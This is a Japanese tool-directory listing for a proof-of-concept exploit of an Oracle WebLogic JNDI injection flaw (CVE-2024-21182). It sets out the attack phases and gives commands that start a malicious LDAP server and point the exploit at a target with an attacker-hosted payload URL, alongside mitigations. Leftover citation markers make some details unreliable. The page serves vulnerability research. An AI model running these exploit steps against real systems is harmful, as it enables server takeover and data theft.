Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE | Kitploit
ツール/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2ヶ月前未レビュー

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 説明

CVE-2024-21182 は、Oracle WebLogic Server の Core コンポーネントに影響を与える、認証を必要としない JNDI インジェクション脆弱性です。T3 または IIOP プロトコルを介したリモートの攻撃者が、サーバー上で任意のコードを実行 (RCE) し、サーバー上のすべてのデータへの完全なアクセスを取得できる可能性があります[citation:5][citation:8][citation:9]。

このリポジトリには、AggregatableOpaqueReference + MessageDestinationReference ガジェットチェーンを使用して CVE-2023-21839 のパッチを突破する、動作する Proof of Concept (PoC) が含まれています[citation:2][citation:4]。

🚨 脆弱性の詳細

攻撃ベクトル

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • ネットワーク (AV:N): リモートから悪用可能
  • 複雑度が低い (AC:L): 特別な条件は不要
  • 認証不要 (PR:N): 匿名アクセス
  • ユーザー操作不要 (UI:N): 受動的な悪用

⚙️ 攻撃のフェーズ

フェーズ 1: 偵察: T3/IIOP ポート (7001) が公開されている WebLogic サーバーを特定する。

フェーズ 2: 分析: サーバーが脆弱なバージョン (12.2.1.4.0 または 14.1.1.0.0) を実行しているか、2024年10月のパッチが適用されていないかを判断する。

フェーズ 3: 悪用 (技術的な流れ):

  1. ガジェットの構築: 攻撃者は AggregatableOpaqueReference オブジェクトを作成する[citation:2]。
  2. リファレンスの注入: Java のリフレクションを使用して、前述のオブジェクトのプライベートフィールド referent を、悪意のある MessageDestinationReference を指すように変更する[citation:4]。
  3. バインドとルックアップ: 悪意のあるオブジェクトをサーバーの JNDI ツリーに「バインド」し、その後「ルックアップ」する。
  4. JNDI 解決: オブジェクトを検索すると、サーバーは攻撃者が制御する URL (LDAP サーバー) に対して新しい JNDI クエリを実行する。
  5. LDAP サーバー: 攻撃者の HTTP サーバーにホストされている Java コードへの参照を返す。
  6. コード実行: WebLogic サーバーが Java クラスをダウンロードしてインスタンス化し、被害マシンのコンテキストでその内容を実行する。

🛠️ 前提条件

  • Docker と Docker Compose: 分離されたテスト環境用[citation:2]。
  • JDK 8 以上: T3 クライアントのコンパイルと実行用。
  • WebLogic T3 クライアント: wlthint3client.jar (WebLogic のインストールから抽出可能)。

🚀 PoC の使用方法

ラボ環境 (Docker)

root@kitploit:~
# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d

# 3. Ejecutar la explotación automática
./validate.sh

Explotación contra un objetivo real (autorizado)
bash
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py

# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

## 📊 実証された影響

サーバー上でのリモートコード実行 (RCE)

アプリケーションの重要データへの不正アクセス

アプリケーションサーバーの完全な侵害

企業ネットワーク内での横展開 (ラテラルムーブメント) の潜在的な入り口

ランサムウェアやその他の悪意のあるペイロード展開の基盤

CISA による現在のステータス: "Known To Be Used in Ransomware Campaigns? Unknown" (ただし、通常は該当し、ミドルウェアの RCE はランサムウェア侵入の初期ベクトルとなる)。

## 🛡️ 緩和策

直ちにパッチを適用する: Oracle Critical Patch Update (2024年10月またはそれ以降) を適用する。

ネットワークの制限: T3/IIOP ポート (例: 7001) へのアクセスを信頼できる送信元のみにブロック/制限する。

監視: JNDI ツリー内の異常なバインド/ルックアップの試みを検出する。

## ⚠️ 法的免責事項

このコードは教育および研究目的に限られます。明示的な許可なくシステムに対してこの PoC を不正に使用することは違法です。作者はこの情報の悪用について一切の責任を負いません。

## 📚 参考情報

NVD - CVE-2024-21182

CISA KEV Catalog

Oracle Security Advisory

元の技術分析

## 🤝 クレジット

ガジェットチェーンを発見した最初の研究者

再現可能な Docker ラボを提供した dinosn
ツールをダウンロード
属性値
CVECVE-2024-21182
製品Oracle WebLogic Server (Core)
影響を受けるバージョン12.2.1.4.0 および 14.1.1.0.0[citation:7]
利用可能なパッチOracle Critical Patch Update (2024年7月および2024年10月)[citation:6]
CISA KEV ステータスアクティブな悪用が確認済み (2026年6月1日追加)[citation:3][citation:8]
CISA の緩和期限2026年6月4日[citation:8]